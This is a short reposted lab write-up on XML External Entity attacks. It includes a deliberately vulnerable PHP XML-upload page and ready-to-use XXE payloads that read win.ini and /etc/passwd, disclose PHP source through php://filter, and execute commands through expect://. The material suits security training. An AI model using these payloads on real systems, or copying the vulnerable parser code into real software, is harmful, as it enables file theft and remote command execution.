Lab - XML eXternal Entity Attack
来源:互联网 发布:c语言排序方法 编辑:程序博客网 时间:2024/06/06 03:24
Prepare
Lab
Linux kali 3.14-kali1-686-pae
Requments
# apt-get install libapache2-mod-php5 php-xml-dtd php-xml-parser libexpect-php5
Demo Code
<html> <body> <h1>Process XML</h1> <form action="" method="post" enctype="multipart/form-data"> <label for="file">Archive XML:</label> <input type="file" name="file" id="file"> <input type="submit" name="submit" value="submit"><br /></form> <hr> <h1>Results</h1> <?php # error_reporting(E_ALL); # ini_set("display_errors", 1); if ( isset($_FILES["file"]) ) { $doc = new DOMDocument(); $doc->validateOnParse = true; $doc->Load($_FILES["file"]["tmp_name"]); $tags = $doc->getElementsByTagName("data"); foreach($tags as $tag) { echo "<pre>" . $tag->nodeValue . "</pre>\n"; } } else { echo "invalid xml format";} ?> </body> </html>
Exploit
Windows
File Inclusion
<?xml version="1.0" encoding="utf-8"?><!DOCTYPE somexml[<!ENTITY message SYSTEM "file:///C:/Windows/win.ini">]><xxx>&message;</xxx>
Source Disclosure
<?xml version="1.0" encoding="utf-8"?><!DOCTYPE somexml[<!ENTITY message SYSTEM "php://filter/read=convert.base64-encode/resource=C:/xampp/htdocs/recv.php">]><xxx>&message;</xxx>
Linux
File Inclusion
<?xml version="1.0" encoding="utf-8"?><!DOCTYPE somexml [<!ENTITY hello SYSTEM "file:///etc/passwd">]><somexml><message>&hello;</message></somexml>
Source Disclosure
<?xml version="1.0" encoding="utf-8"?><!DOCTYPE somexml [<!ENTITY hello SYSTEM "php://filter/read=convert.base64-encode/resource=/var/www/xxe.php">]><somexml><message>&hello;</message></somexml>
Command Execution
<?xml version="1.0" encoding="utf-8"?><!DOCTYPE somexml [<!ENTITY hello SYSTEM "expect://dir">]><somexml><message>&hello;</message></somexml>
References
- https://pentesterlab.com/exercises/play_xxe
- http://blog.h3xstream.com/2014/06/identifying-xml-external-entity.html
- http://www.beneaththewaves.net/Software/On_The_Outside_Reaching_In.html
- http://www.owasp.org/index.php/XML_External_Entity_(XXE)_Processing
- http://phpsecurity.readthedocs.org/en/latest/Injection-Attacks.html
- http://stackoverflow.com/questions/24117700/clarifications-on-xxe-vulnerabilities-throughout-php-versions
0 0
- Lab - XML eXternal Entity Attack
- ICS attack lab总结
- Local DNS Attack Lab
- [CS:APP] Attack Lab
- CSAPP-Attack-Lab
- Multiple Adobe Products - XML External Entity And XML Injection Vulnerabilities
- 通过JAXB看XML外部实体注入(XML External Entity)
- CSAPP 3e Attack lab
- Seed lab:Remote DNS Attack
- Xml DTD校验中关于external entity的实现策略。
- Adobe ColdFusion < 11 Update 10 - XML External Entity Injection
- attack lab running on a illegal host
- http://blog.h3xstream.com/2014/06/identifying-xml-external-entity.html
- XML entity
- xml entity
- CSAPP3e - x86-64 assembly code analysis - Attack Lab: Level I
- CSAPP3e - x86-64 assembly code analysis - Attack Lab: Level II
- CSAPP:Attack Lab —— 缓冲区溢出攻击实验
- LNMP配置+yii环境
- volatile与编译器代码优化浅析
- 课程设计---银行储蓄系统
- Android多媒体:音效链
- **编码**
- Lab - XML eXternal Entity Attack
- 常用正则表达式大全!(例如:匹配中文、匹配html)
- 【转】C# WinForm窗体及其控件的自适应
- 学习老外用webstorm开发nodejs的技巧--代码提示DefinitelyTyped
- Email与数字发行
- 053第450题
- Web前端学习——JS基础一之DIV格式变换
- BZOJ 2186 [Sdoi2008]沙拉公主的困惑 线性逆元
- 将HTML特殊转义为实体字符的两种实现方式